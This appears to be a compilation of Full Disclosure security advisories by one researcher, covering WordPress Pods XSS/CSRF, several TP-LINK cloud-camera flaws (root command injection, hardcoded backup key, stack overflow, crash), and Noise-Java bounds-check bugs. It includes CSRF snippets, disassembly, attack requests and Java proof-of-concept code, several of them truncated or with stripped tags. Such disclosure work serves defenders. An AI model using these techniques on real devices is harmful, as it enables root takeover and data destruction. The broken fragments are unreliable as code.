[FD] Wordpress plugin Pods = 2.4.3 XSS and CSRF vulnerabilities

2015-01-11 Thread Pietro Oliva
Vulnerability title: Wordpress plugin Pods = 2.4.3 XSS and CSRF vulnerabilities
Author: Pietro Oliva
CVE: CVE-2014-7956, CVE-2014-7957
Product: pods
Affected version: pods = 2.4.3
Vulnerabilities fixed in version: 2.5

XSS vulnerability (CVE-2014-7956, authentication is needed):

Multiple CSRF (CVE-2014-7957,authentication needed):

CSRF 1 (bruteforce pods IDs and delete them):

for (i=0; i50;i++)
document.write('img style=display:none

CSRF 2 (delete pods plugin data):

body onload=document.forms[0].submit();
form method=post
input type=hidden name=pods_reset value=Reset Pods settings and data 

CSRF 3 (deactivate pods and delete data):

body onload=document.forms[0].submit();
form method=post
Deactivate and Delete Pods data 
input type=hidden name=pods_reset_deactivate value= Deactivate
and Delete Pods data 

CSRF 4 (enable roles and capabilities component and delete admin role):

function continueExecution(){
document.write('link rel=stylesheet
document.write('link rel=stylesheet
setTimeout(continueExecution, 1);

CSRF 4 XSS impact:


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Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] TP-LINK Cloud Cameras NCXXX Remote NULL Pointer Dereference

2020-03-31 Thread Pietro Oliva
Vulnerability title: TP-LINK Cloud Cameras NCXXX Remote NULL Pointer Dereference
Author: Pietro Oliva
CVE: CVE-2020-10231
Vendor: TP-LINK
Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450
Affected version: NC200 <= 2.1.8 build 171109, NC210 <= 1.0.9 build 171214,
  NC220 <= 1.3.0 build 180105, NC230 <= 1.3.0 build 171205,
  NC250 <= 1.3.0 build 171205, NC260 <= 1.5.1 build 190805,
  NC450 <= 1.5.0 build 181022

The issue is located in the httpLoginRpm method of the ipcamera binary (handler
method for /login.fcgi), where after successful login, there is no check for
NULL in the return value of httpGetEnv(environment, "HTTP_USER_AGENT"). Shortly
after that, there is a call to strstr(user_agent_string, "Firefox") and if a
User-Agent header is not specified by the client, httpGetEnv will return NULL,
and a NULL pointer dereference occurs when calling strstr, with consequent crash
of the ipcamera process.

After the crash, the web interface on port 80 will not be available anymore.

An attacker could exploit this issue by just sending a login request with valid
credentials (such as admin or limited user), but without an user-agent HTTP
header. Default credentials can be used to bypass the credentials requirement.

The disassembly of affected code from an NC200 camera is shown below:

0x0047dca0   lw a0, (user_arg)
0x0047dca4   lw a1, (password_arg)
0x0047dca8   lw t9, -sym.swUMMatchPassword(gp)
0x0047dcac   nop
0x0047dcb0   jalr t9
0x0047dcb4   nop
0x0047dcb8   lw gp, (saved_gp)
0x0047dcbc   sw v0, (auth_result)
0x0047dcc0   lw v0, (auth_result)
0x0047dcc4   nop
0x0047dcc8   bnez v0, 0x47de34
0x0047dccc   nop
0x0047dcd0   sw zero, (arg_54h)
0x0047dcd4   lw a0, (environment)
0x0047dcd8   lw a1, -0x7fe4(gp)
0x0047dcdc   nop
0x0047dce0   addiu a1, a1, -0x7cb0   ; "HTTP_USER_AGENT"
0x0047dce4   lw t9, -sym.httpGetEnv(gp)
0x0047dce8   nop
0x0047dcec   jalr t9
0x0047dcf0   nop
0x0047dcf4   lw gp, (saved_gp)
0x0047dcf8   sw v0, (user_agent_ptr)
0x0047dcfc   lw a0, (user_agent_ptr) ; <== This pointer could be NULL
0x0047dd00   lw a1, -0x7fe4(gp)
0x0047dd04   nop
0x0047dd08   addiu a1, a1, -0x7ca0   ; "Firefox"
0x0047dd0c   lw t9, -sym.imp.strstr(gp)
0x0047dd10   nop
0x0047dd14   jalr t9

Disclosure timeline:

2nd December 2019 - Initial vulnerability report for NC200.

4th December 2019 - Vendor confirms vulnerablity but does not start fixing
due to the product being end-of-life.

4th December 2019 - Notified vendor the vulnerability details will be public
and it should be fixed.

6th December 2019 - Thanks for your opinion, we will discuss and write back
to you.

7th February 2020 - Notified vendor issue exists on NC450 and possibly all
models in between. Fixed a disclosure deadline in 30 days.

8th February 2020 - Vendor: We will check but please be patient.

18th February 2020 - We failed to reproduce the issue with the provided PoC.

24th February 2020 - Reverse engineered all the firmware images on behalf of
 the vendor and notified they were all vulnerable.

2nd March 2020 - Vendor asks to check fixes for NC200.

2nd March 2020 - Confirmed fix. Asked the vendor to do the same on all cameras.

3rd March 2020 - Vendor will check on other cameras, but will take some time.

3rd March 2020 - Asked the vendor to be quick.

9th March 2020 - Notified CVE identifier to vendor, gave extra week to patch.

9th March 2020 - Vendor is testing fix on all models.

13th March 2020 - Vendor asks to confirm fixes.

13th March 2020 - Confirmed fixes and asked the vendor to publish updates.
  Disclosure delayed one week to give some time to patch if
  the vendor published firmware updates.

29th March 2020 - No updates have been made public by the vendor. Releasing
  details to the public after almost 4 months from initial

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] TP-LINK Cloud Cameras NCXXX Bonjour Command Injection

2020-05-01 Thread Pietro Oliva
Vulnerability title: TP-LINK Cloud Cameras NCXXX Bonjour Command Injection
Author: Pietro Oliva
CVE: CVE-2020-12109
Vendor: TP-LINK
Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450
Affected version: NC200 <= 2.1.9 build 200225, NC210 <= 1.0.9 build 200304,
  NC220 <= 1.3.0 build 200304, NC230 <= 1.3.0 build 200304,
  NC250 <= 1.3.0 build 200304, NC260 <= 1.5.2 build 200304,
  NC450 <= 1.5.3 build 200304.

Fixed version:NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401,
  NC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401,
  NC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401,
  NC450 <= 1.5.4 build 200401

The issue is located in the swSystemSetProductAliasCheck method of the
ipcamera binary (Called when setting a new alias for the device via
/setsysname.fcgi), where despite a check on the name length, no other checks
are in place in order to prevent shell metacharacters from being introduced.
The system name would then be used in swBonjourStartHTTP as part of a shell
command where arbitrary commands could be injected and executed as root.

Attackers could exploit this vulnerability to remotely execute commands as root
on affected devices.

An attacker would first need to authenticate to the web interface and make a
request such as the following (the request contents might change slightly
between cameras):

POST /setsysname.fcgi HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
Cookie: sess=x


In a device where telnetd has not been removed from the release firmware (such
as NC200), this would spawn the telnetd deamon. Default root/root credentials
could then be used to obtain a root shell via telnet.

The disassembly of affected code from an NC200 camera is shown below:


  0x0049f1cc   lui gp, 0xa
  0x0049f1d0   addiu gp, gp, -0x3ebc
  0x0049f1d4   addu gp, gp, t9
  0x0049f1d8   addiu sp, sp, -0x28
  0x0049f1dc   sw ra, (var_24h)
  0x0049f1e0   sw fp, (var_20h)
  0x0049f1e4   move fp, sp
  0x0049f1e8   sw gp, (var_10h)
  0x0049f1ec   sw a0, (alias_arg)
  0x0049f1f0   lw v0, (alias_arg)
  0x0049f1f4   nop
  ,=< 0x0049f1f8   beqz v0, 0x49f218
  |   0x0049f1fc   nop
  |   0x0049f200   lw v0, (alias_arg)
  |   0x0049f204   nop
  |   0x0049f208   lb v0, (v0)
  |   0x0049f20c   nop
 ,==< 0x0049f210   bnez v0, 0x49f224
 ||   0x0049f214   nop
 |`-> 0x0049f218   addiu v0, zero, 0x42f
 |,=< 0x0049f21c   b 0x49f258
 ||   0x0049f220   sw v0, (arg_18h)
 `--> 0x0049f224   lw a0, (alias_arg)
  |   0x0049f228   lw t9, -sym.imp.strlen(gp)
  |   0x0049f22c   nop
  |   0x0049f230   jalr t9
  |   0x0049f234   nop
  |   0x0049f238   lw gp, (arg_10h)
  |   0x0049f23c   sltiu v0, v0, 0x81
 ,==< 0x0049f240   bnez v0, 0x49f254
 ||   0x0049f244   nop
 ||   0x0049f248   addiu v0, zero, 0x430
,===< 0x0049f24c   b 0x49f258
|||   0x0049f250   sw v0, (arg_18h)
|`--> 0x0049f254   sw zero, (arg_18h)
`-`-> 0x0049f258   lw v0, (arg_18h)
  0x0049f25c   move sp, fp
  0x0049f260   lw ra, (var_24h)
  0x0049f264   lw fp, (var_20h)
  0x0049f268   jr ra
  0x0049f26c   addiu sp, sp, 0x28


0x0043a008addiu v0, fp, 0x20
0x0043a00cmove a0, v0
0x0043a010addiu a1, zero, 0x88
0x0043a014lw t9, -sym.swBonjourGetName(gp) ; <= get the system name in fp+20
0x0043a01cjalr t9
0x0043a024lw gp, (arg_10h)
0x0043a028addiu v0, fp, 0x20   ; <= put ptr to name in v0
0x0043a02clw a0, -0x7fdc(gp)
0x0043a034addiu a0, a0, 0xd10
; a0 => "mDNSResponderPosix -n \"%s\" -t _http._tcp -p %d -x path=/login.html &"
0x0043a038move a1, v0  ; <= a1 points to system name
0x0043a03clw a2, (arg_b0h)
0x0043a040lw t9, -sym.cmCommand(gp); Execute the command
0x0043a048jalr t9

Mitigating factors:
-NC210 Cameras have a filter for "bad chars". This means the payload cannot
contain any of the following characters: dot(.), at(@), dash(-), underscore(_),
whitespace( ), and single quote(').
-Some cameras do not ship with telnetd, so other methods such as using wget or
curl to download a payload from the network might be required to obtain a shell.

Install firmware updates provided by the vendor to fix the vulnerability.
The latest updates can be found at the following URLs:


[FD] TP-LINK Cloud Cameras NCXXX SetEncryptKey Command Injection

2020-05-01 Thread Pietro Oliva
Vulnerability title: TP-LINK Cloud Cameras NCXXX SetEncryptKey Command Injection
Author: Pietro Oliva
CVE: CVE-2020-12111
Vendor: TP-LINK
Product: NC260, NC450
Affected version: NC260 <= 1.5.2 build 200304, NC450 <= 1.5.3 build 200304
Fixed version:NC260 <= 1.5.3 build_200401, NC450 <= 1.5.4 build 200401

The issue is located in the httpSetEncryptKeyRpm method (handler for
/setEncryptKey.fcgi) of the ipcamera binary, where the user-controlled
EncryptKey parameter is used directly as part of a command line to be executed
as root without any input sanitization.

Attackers could exploit this vulnerability to remotely execute commands as root
on affected devices.

An attacker would first need to authenticate to the web interface and make a
POST request to /setEncryptKey.fcgi. Commands to be executed with root
privileges can be injected in the EncryptKey parameter.

The disassembly of affected code from an NC450 camera is shown below:


0x00491728   lw a0, -0x7fd4(gp)
0x0049172c   nop
0x00491730   addiu a0, a0, 0x3344; "echo %s > %s/%08X"
0x00491734   lw a1, (EncryptKey_param)   ; Attacker controlled string
0x00491738   lw a2, -0x7fd4(gp)
0x0049173c   nop
0x00491740   addiu a2, a2, 0x3330; 0x583330 ; "/tmp/.encryptkey/"
0x00491744   lw a3, -0x7fe8(gp)
0x00491748   nop
0x0049174c   addiu a3, a3, -0xf10
0x00491750   lw a3, (a3)
0x00491754   lw t9, -sym.cmCommand(gp)
0x00491758   nop
0x0049175c   jalr t9

Install firmware updates provided by the vendor to fix the vulnerability.
The latest updates can be found at the following URLs:


Disclosure timeline:
29th March 2020 - Vulnerability reported to vendor.
27th April 2020 - Patched firmware provided by vendor for verification.
27th April 2020 - Confirmed the vulnerability was fixed.
29th April 2020 - Firmware updates released to the public.
29th April 2020 - Vulnerability details are made public.

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] TP-LINK Cloud Cameras NCXXX Hardcoded Encryption Key

2020-05-01 Thread Pietro Oliva
Vulnerability title: TP-LINK Cloud Cameras NCXXX Hardcoded Encryption Key
Author: Pietro Oliva
CVE: CVE-2020-12110
Vendor: TP-LINK
Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450
Affected version: NC200 <= 2.1.9 build 200225, NC210 <= 1.0.9 build 200304,
  NC220 <= 1.3.0 build 200304, NC230 <= 1.3.0 build 200304,
  NC250 <= 1.3.0 build 200304, NC260 <= 1.5.2 build 200304,
  NC450 <= 1.5.3 build 200304.

Fixed version:NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401,
  NC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401,
  NC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401,
  NC450 <= 1.5.4 build 200401

The issue is located in the methods swSystemBackup and sym.swSystemRestoreFile,
where a hardcoded encryption key is used in order to encrypt/decrypt a config
backup file. The algorithm in use is DES ECB with modified s-boxes and
permutation tables.

Attackers could exploit this vulnerability to decrypt backup files and get
access to sensitive data, such as the following:
-Alarm FTP server user and password
-Wlan passphrase
-PPPOE user and password
-Alarm SMTP server user and password
-DDNS user and password

In addition to that, attackers could forge an encrypted backup file that can
be restored via the web interface. This allowed arbitrary files to be written or
overwritten with arbitrary attacker-controlled contents. Needless to say, this
could result in permanent damage or code execution as root.

An attacker would have to figure out the modified DES algorithm in order to be
able to encrypt/decrypt config backup files. This is not hard to do with some
google search. Once that has been done, attackers can either decrypt backup
files or create their own with custom contents, effectlively writing arbitrary
files on the device.

The disassembly of affected code from an NC200 camera is shown below:


0x004a0f88   lui gp, 0xa
0x004a0f8c   addiu gp, gp, -0x5c78
0x004a0f90   addu gp, gp, t9
0x004a0f94   addiu sp, sp, -0x4f8
0x004a0f98   sw ra, (var_4f4h)
0x004a0f9c   sw fp, (var_4f0h)
0x004a0fa0   move fp, sp
0x004a0fa4   sw gp, (var_18h)
0x004a0fa8   sw a0, (encrypted_filename_ptr)
0x004a0fac   lw v0, -0x7fe4(gp)
0x004a0fb0   nop
0x004a0fb4   addiu v0, v0, -0x4c40   ; "/tmp/plainBackup"
0x004a0fb8   nop
0x004a0fbc   sw v0, (decrypted_filename_ptr)
0x004a0fc0   lw a0, (encrypted_filename_ptr)
0x004a0fc4   lw a1, -0x7fe4(gp)
0x004a0fc8   nop
0x004a0fcc   addiu a1, a1, -0x4c2c   ; "tp-link"
0x004a0fd0   lw a2, (decrypted_filename_ptr)
0x004a0fd4   lw t9, -sym.DES_Decrypt(gp)
0x004a0fd8   nop
0x004a0fdc   jalr t9


0x004a1c54   lw a0, -0x7fe4(gp)
0x004a1c58   nop
0x004a1c5c   addiu a0, a0, -0x4bbc   ; "/usr/local/config/ipcamera/pBackup"
0x004a1c60   lw a1, -0x7fe4(gp)
0x004a1c64   nop
0x004a1c68   addiu a1, a1, -0x4c2c   ; "tp-link"
0x004a1c6c   lw a2, -0x7fe4(gp)
0x004a1c70   nop
0x004a1c74   addiu a2, a2, -0x4b84   ; "/usr/local/config/ipcamera/eBackup"
0x004a1c78   lw t9, -sym.DES_Encrypt(gp)
0x004a1c7c   nop
0x004a1c80   jalr t9

Mitigating factors:
-Almost every camera model has a different hardcoded key. However, this is not
hard to find and all cameras of the same model share the same encryption key
which cannot be changed.

Install firmware updates provided by the vendor to fix the vulnerability.
The latest updates can be found at the following URLs:


Disclosure timeline:
29th March 2020 - Vulnerability reported to vendor.
10th April 2020 - Patched firmware provided by vendor for verification.
10th April 2020 - Confirmed the vulnerability was fixed.
29th April 2020 - Firmware updates released to the public.
29th April 2020 - Vulnerability details are made public.

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] TP-LINK Cloud Cameras NCXXX DelMultiUser Stack Overflow

2020-06-16 Thread Pietro Oliva
Vulnerability title: TP-LINK Cloud Cameras NCXXX DelMultiUser Stack Overflow
Author: Pietro Oliva
CVE: CVE-2020-13224
Vendor: TP-LINK
Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450
Affected versions: NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401,
   NC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401,
   NC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401,
   NC450 <= 1.5.4 build 200401

Fixed versions:NC200 <= 2.1.11 build 200508, NC210 <= 1.0.11 build 200612,
   NC220 <= 1.3.2 build 200508, NC230 <= 1.3.2 build 200508,
   NC250 <= 1.3.2 build 200508, NC260 <= 1.5.4 build_200508,
   NC450 <= 1.5.5 build 200508

The issue is located in the httpDelMultiUserRpm method of the ipcamera binary
(Called when deleting multiple users via /delmultiuser.fcgi), where a
comma-delimited list of usernames is passed as an input, and a list of error
codes for each user deletion attempt is returned to the user via HTTP. The list
of error codes returned to the user is temporary stored in a fixed-size stack
buffer, while there in no limit on the number of usernames that the user can
specify. Since the error codes are concatenated in a loop without any boundary
checks until a string terminator has been found in the user-supplied string, a
stack-based buffer overflow can occur if the user provided an input string
with enough commas or usernames.

Attackers could exploit this vulnerability to remotely crash the ipcamera
process, or remotely execute arbitrary code as root.

An attacker would first need to authenticate to the web interface and make a
request similar to the following to trigger a crash of the ipcamera process:

POST /delmultiuser.fcgi HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
Cookie: sess=x


The disassembly of affected code from an NC200 camera is shown below:


; Get pointer to Usernames param from HTTP request
   ││0x0047ee90  lw a0, (env)
   ││0x0047ee94  lw a1, -0x7fe4(gp)
   ││0x0047ee98  nop
   ││0x0047ee9c  addiu a1, a1, -0x73b0 ; "Usernames" string
   ││0x0047eea0  lw t9, -sym.httpGetEnv(gp)
   ││0x0047eea4  nop
   ││0x0047eea8  jalr t9
   ││0x0047eeac  nop

; Save the pointer and return error if it is NULL
   ││0x0047eeb0  lw gp, (arg_10h)
   ││0x0047eeb4  sw v0, (arg_usernames)
   ││0x0047eeb8  lw v0, (arg_usernames)
   ││0x0047eebc  nop
   ││┌─< 0x0047eec0  bnez v0, 0x47eed4
   │││   0x0047eec4  nop
   │││   0x0047eec8  addiu v0, zero, -1
  ┌< 0x0047eecc  b 0x47f0bc
     0x0047eed0  sw v0, (arg_46ch)

; If the pointer is not null, initialize to 0 the error code buffer on the stack
  │││└─> 0x0047eed4  addiu v0, fp, 0x40
  │││0x0047eed8  move a0, v0
  │││0x0047eedc  move a1, zero
  │││0x0047eee0  addiu a2, zero, 0x400
  │││0x0047eee4  lw t9, -sym.imp.memset(gp)
  │││0x0047eee8  nop
  │││0x0047eeec  jalr t9
  │││0x0047eef0  nop
  │││0x0047eef4  lw gp, (arg_10h)

; Copy the arg_usernames pointer to arg_usernames_copy
  │││0x0047eef8  lw v0, (arg_usernames)
  │││0x0047eefc  nop
  │││0x0047ef00  sw v0, (arg_usernames_copy)

; Get a pointer to the first occurrence of the comma character and store it
  │││┌─> 0x0047ef04  lw a0, (arg_usernames_copy)
  │││╎   0x0047ef08  addiu a1, zero, 0x2c
  │││╎   0x0047ef0c  lw t9, -sym.imp.strchr(gp)
  │││╎   0x0047ef10  nop
  │││╎   0x0047ef14  jalr t9
  │││╎   0x0047ef18  nop
  │││╎   0x0047ef1c  lw gp, (arg_10h)
  │││╎   0x0047ef20  sw v0, (ptr_to_next_comma)

; If the pointer is NULL go and delete the last username in the list
  │││╎   0x0047ef24  lw v0, (ptr_to_next_comma)
  │││╎   0x0047ef28  nop
 ┌─< 0x0047ef2c  beqz v0, 0x47efc0
 ╎   0x0047ef30  nop

; Replace the comma character with a string terminator and delete the user
 ╎   0x0047ef34  lw v0, (ptr_to_next_comma)
 ╎   0x0047ef38  nop
 ╎   0x0047ef3c  sb zero, (v0)
 ╎   0x0047ef40  lw a0, (arg_usernames_copy)
 ╎   0x0047ef44  lw t9, -sym.swUMDelUser(gp)
 ╎   0x0047ef48  nop
 ╎   0x0047ef4c  jalr t9
 ╎   0x0047ef50  nop

; Create a string with the error code from swUMDelUser
 ╎   0x0047ef54  lw gp, (arg_10h)
 ╎   0x0047ef58  sw v0, (deluser_error_code)
 ╎   0x0047ef5c  addiu v0, fp, 0x448
 ╎   0x0047ef60  move a0, v0
 ╎   0x0047ef64  lw a1, -0x7fe4(gp)
 ╎   0x0047ef68  nop
 ╎   0x0047ef6c  addiu a1, a1, -0x73a4   ; '{"errorCode":},'
 ╎   0x0047ef70  lw a2, (deluser_error_code)
 ╎   0x0047ef74  lw t9, -sym.imp.sprintf(gp)
 ╎   0x0047ef78  nop

[FD] Noise-Java AESGCMFallbackCipherState.encryptWithAd() insufficient boundary checks

2020-09-04 Thread Pietro Oliva via Fulldisclosure
Vulnerability title: Noise-Java AESGCMFallbackCipherState.encryptWithAd() 
insufficient boundary checks
Author: Pietro Oliva
CVE: CVE-2020-25022
Vendor: Rhys Weatherley (Creator of Noise Framework's reference implementation 
in Java)
Product: Noise-Java 
Affected version: No version information is currently available.
Fixed version:Check latest commit and pull request

The issue is located in the AESGCMFallbackCipherState.encryptWithAd() method 
defined in AESGCMFallbackCipherState.java, where multiple boundary checks are
performed to prevent invalid length or offsets from being specified for the
encrypt or copy operation. However, some checks were found to be either 
incomplete or missing, which would likely lead to the following scenarios:
- Out-of-bounds read or write with huge plaintextOffset, negative 
  or negative length (Depending on the underlying JVM's validation).
- Exception thrown by the JVM instead of Noise-Java throwing 

Further checks might be implemented in the JVM and an exception might be thrown 
before attempting any operation with invalid arguments.
If that is not the case, OOB read/write or a silent return on invalid arguments
might occur. This could in turn lead to arbitrary code execution in the context
of the JVM, memory disclosure, denial of service, or data loss.

Proof of concept:
Depending on the JVM, running the following code will result in either OOB read
(see CVE-2020-17360 in Avian JVM) or exception being thrown by the JVM:

package com.southernstorm.noise.protocol;

public class poc {

public static void main(String[] args) {
byte[] plaintext = "This is my plaintext".getBytes();
byte[] ciphertext = new byte[plaintext.length];
CipherState cs = new AESGCMFallbackCipherState();

// Passing a large plaintextOffset should result in  a 
//   instead of relying on the JMV's implementation of System.arraycopy.
try {
cs.encryptWithAd(null, plaintext, 0x7fff, ciphertext, 0, 1);
catch(Exception e){
System.out.println("An exception has been thrown: " + e);



public int encryptWithAd(byte[] ad, byte[] plaintext, int plaintextOffset,
byte[] ciphertext, int ciphertextOffset, int length)
throws ShortBufferException {
int space;
if (ciphertextOffset > ciphertext.length) // BUG: ciphertextOffset could be 
  // bypassing this length check
space = 0;
space = ciphertext.length - ciphertextOffset; 
// BUG: a negative ciphertextOffset would increase the space instead of 
decreasing it
if (!haskey) {
if (length > space) // BUG: this check can be bypassed with negative 
throw new ShortBufferException();
if (plaintext != ciphertext || plaintextOffset != ciphertextOffset)

/* Multiple issues here:
1. plaintextOffset is never checked. Depending on the JVM's 
   This could result in OOB read in arraycopy (see CVE-2020-17360 
for Avian JVM) or 
   exception being thrown.
2. ciphertextOffset could be negative, bypassing the checks on the 
   Depending on the JVM, this could result in OOB read/write or 
exception being thrown.
3. If the length is negative, depending on the JVM, arraycopy could 
result in OOB
   read/write, exception being thrown, or silent return (e.g. 
CVE-2020-17360 in Avian) */

System.arraycopy(plaintext, plaintextOffset, ciphertext, 
ciphertextOffset, length);
return length;
if (space < 16 || length > (space - 16)) // BUG: this can be bypassed 
with negative length
throw new ShortBufferException();

/* Multiple issues here as well:
1. plaintextOffset is never checked. this could result in an 
exception being thrown
   by the JVM.
2. ciphertextOffset could be negative, bypassing the checks on the 
   Depending on the JVM, this could result in OOB write in 
arraycopy or exception being thrown.
3. length could be negative. Depending on the JVM, this could 
result in OOB write in arraycopy 
   or exception being thrown. */

encryptCTR(plaintext, plaintextOffset, ciphertext, ciphertextOffset, 
ghash.update(ciphertext, ciphertextOffset, length);
ghash.pad(ad != null ? ad.length : 0, length);
ghash.finish(ciphertext, ciphertextOffset + length, 16);
for (int index = 0; index < 16; ++index)
ciphertext[ciphertextOffset + length + index] ^= hashKey[index];
return length + 16;

As can be seen i

[FD] Noise-Java ChaChaPolyCipherState.encryptWithAd() insufficient boundary checks

2020-09-04 Thread Pietro Oliva via Fulldisclosure
Vulnerability title: Noise-Java ChaChaPolyCipherState.encryptWithAd() 
insufficient boundary checks
Author: Pietro Oliva
CVE: CVE-2020-25021
Vendor: Rhys Weatherley (Creator of Noise Framework's reference implementation 
in Java)
Product: Noise-Java 
Affected version: No version information is currently available.
Fixed version:Check latest commit and pull request

The issue is located in the ChaChaPolyCipherState.encryptWithAd() method 
defined in ChaChaPolyCipherState.java, where multiple boundary checks are
performed to prevent invalid length or offsets from being specified for the
encrypt or copy operation. However, some checks were found to be either 
incomplete or missing, which would likely lead to the following scenarios:
- Out-of-bounds read or write with huge plaintextOffset, negative 
  or negative length (Depending on the underlying JVM's validation).
- Exception thrown by the JVM instead of Noise-Java throwing 

Further checks might be implemented in the JVM and an exception might be thrown 
before attempting any operation with invalid arguments.
If that is not the case, OOB read/write or a silent return on invalid arguments
might occur. This could in turn lead to arbitrary code execution in the context
of the JVM, memory disclosure, denial of service, or data loss.

Proof of concept:
Depending on the JVM, running the following code will result in either OOB read
(see CVE-2020-17360 in Avian JVM) or exception being thrown by the JVM:

package com.southernstorm.noise.protocol;

public class poc {

public static void main(String[] args) {
byte[] plaintext = "This is my plaintext".getBytes();
byte[] ciphertext = new byte[plaintext.length];
CipherState cs = new ChaChaPolyCipherState();

// Passing a large plaintextOffset should result in a 
// instead of relying on the JMV's implementation of System.arraycopy.
try {
cs.encryptWithAd(null, plaintext, 0x7fff, ciphertext, 0, 1);
catch(Exception e){
System.out.println("An exception has been thrown: " + e);



public int encryptWithAd(byte[] ad, byte[] plaintext, int plaintextOffset,
byte[] ciphertext, int ciphertextOffset, int length) throws 
ShortBufferException {
int space;
if (ciphertextOffset > ciphertext.length) // BUG: ciphertextOffset could be 
  // bypassing this length check
space = 0;
space = ciphertext.length - ciphertextOffset;
// BUG: a negative ciphertextOffset would increase the space instead of 
decreasing it

if (!haskey) {
if (length > space) // BUG: this check can be bypassed with negative 
throw new ShortBufferException();
if (plaintext != ciphertext || plaintextOffset != ciphertextOffset)

/* Multiple issues here:
1. plaintextOffset is never checked. Depending on the JVM's 
   This could result in OOB read in arraycopy (see CVE-2020-17360 
for Avian JVM) or
   exception being thrown.
2. ciphertextOffset could be negative, bypassing the checks on the 
   Depending on the JVM, this could result in OOB read/write or 
exception being thrown.
3. If the length is negative, depending on the JVM, arraycopy could 
result in OOB
   read/write, exception being thrown, or silent return (e.g. 
CVE-2020-17360 in Avian) */

System.arraycopy(plaintext, plaintextOffset, ciphertext, 
ciphertextOffset, length);
return length;
if (space < 16 || length > (space - 16))
throw new ShortBufferException();

/* Multiple issues here as well:
1. plaintextOffset is never checked. this could result in an exception 
being thrown
   by the JVM.
2. ciphertextOffset could be negative, bypassing the checks on the 
   Depending on the JVM, this could result in OOB write in arraycopy or 
exception being thrown.
3. length could be negative. Depending on the JVM, this could result in 
OOB write in arraycopy
   or exception being thrown. */

encrypt(plaintext, plaintextOffset, ciphertext, ciphertextOffset, length);
poly.update(ciphertext, ciphertextOffset, length);
finish(ad, length);
System.arraycopy(polyKey, 0, ciphertext, ciphertextOffset + length, 16);
return length + 16;

As can be seen in the above code, multiple boundary checks are either missing
or incomplete, allowing for invalid length or offsets to be passed to the JVM's
implementation of System.arraycopy or other methods that handle encryption. 
Depending on the JVM in use and how the missing/incomplete checks are exploited,
this could result in eith

[FD] Noise-Java AESGCMOnCtrCipherState.encryptWithAd() insufficient boundary checks

2020-09-04 Thread Pietro Oliva via Fulldisclosure
Vulnerability title: Noise-Java AESGCMOnCtrCipherState.encryptWithAd() 
insufficient boundary checks
Author: Pietro Oliva
CVE: CVE-2020-25023
Vendor: Rhys Weatherley (Creator of Noise Framework's reference implementation 
in Java)
Product: Noise-Java 
Affected version: No version information is currently available.
Fixed version:Check latest commit and pull request

The issue is located in the AESGCMOnCtrCipherState.encryptWithAd() method 
defined in AESGCMOnCtrCipherState.java, where multiple boundary checks are
performed to prevent invalid length or offsets from being specified for the
encrypt or copy operation. However, some checks were found to be either 
incomplete or missing, which would likely lead to the following scenarios:
- Out-of-bounds read or write with huge plaintextOffset, negative 
  or negative length (Depending on the underlying JVM's validation).
- Exception thrown by the JVM instead of Noise-Java throwing 

Further checks might be implemented in the JVM and an exception might be thrown 
before attempting any operation with invalid arguments.
If that is not the case, OOB read/write or a silent return on invalid arguments
might occur. This could in turn lead to arbitrary code execution in the context
of the JVM, memory disclosure, denial of service, or data loss.

Proof of concept:
Depending on the JVM, running the following code will result in either OOB read
(see CVE-2020-17360 in Avian JVM) or exception being thrown by the JVM:

package com.southernstorm.noise.protocol;

public class poc {

public static void main(String[] args) {
byte[] plaintext = "This is my plaintext".getBytes();
byte[] ciphertext = new byte[plaintext.length];
CipherState cs = new AESGCMOnCtrCipherState();

// Passing a large plaintextOffset should result in a 
// instead of relying on the JMV's implementation of System.arraycopy.
try {
cs.encryptWithAd(null, plaintext, 0x7fff, ciphertext, 0, 1);
catch(Exception e){
System.out.println("An exception has been thrown: " + e);



public int encryptWithAd(byte[] ad, byte[] plaintext, int plaintextOffset,
byte[] ciphertext, int ciphertextOffset, int length)
throws ShortBufferException {
int space;
if (ciphertextOffset > ciphertext.length) // BUG: ciphertextOffset could be 
  // bypassing this length check
space = 0;
space = ciphertext.length - ciphertextOffset;
// BUG: a negative ciphertextOffset would increase the space instead of 
decreasing it
if (keySpec == null) {
if (length > space) // BUG: this check can be bypassed with negative 
throw new ShortBufferException();
if (plaintext != ciphertext || plaintextOffset != ciphertextOffset)

/* Multiple issues here:
1. plaintextOffset is never checked. Depending on the JVM's 
   This could result in OOB read in arraycopy (see CVE-2020-17360 
for Avian JVM) or
   exception being thrown.
2. ciphertextOffset could be negative, bypassing the checks on the 
   Depending on the JVM, this could result in OOB read/write or 
exception being thrown.
3. If the length is negative, depending on the JVM, arraycopy could 
result in OOB
   read/write, exception being thrown, or silent return (e.g. 
CVE-2020-17360 in Avian) */

System.arraycopy(plaintext, plaintextOffset, ciphertext, 
ciphertextOffset, length);
return length;
if (space < 16 || length > (space - 16)) // BUG: this can be bypassed with 
negative length
throw new ShortBufferException();
try {

/* Multiple issues here as well:
1. plaintextOffset is never checked. this could result in an 
exception being thrown
   by the JVM.
2. ciphertextOffset could be negative, bypassing the checks on the 
   Depending on the JVM, this could result in OOB write in 
arraycopy or exception being thrown.
3. length could be negative. Depending on the JVM, this could 
result in OOB write in arraycopy
   or exception being thrown. */

int result = cipher.update(plaintext, plaintextOffset, length, 
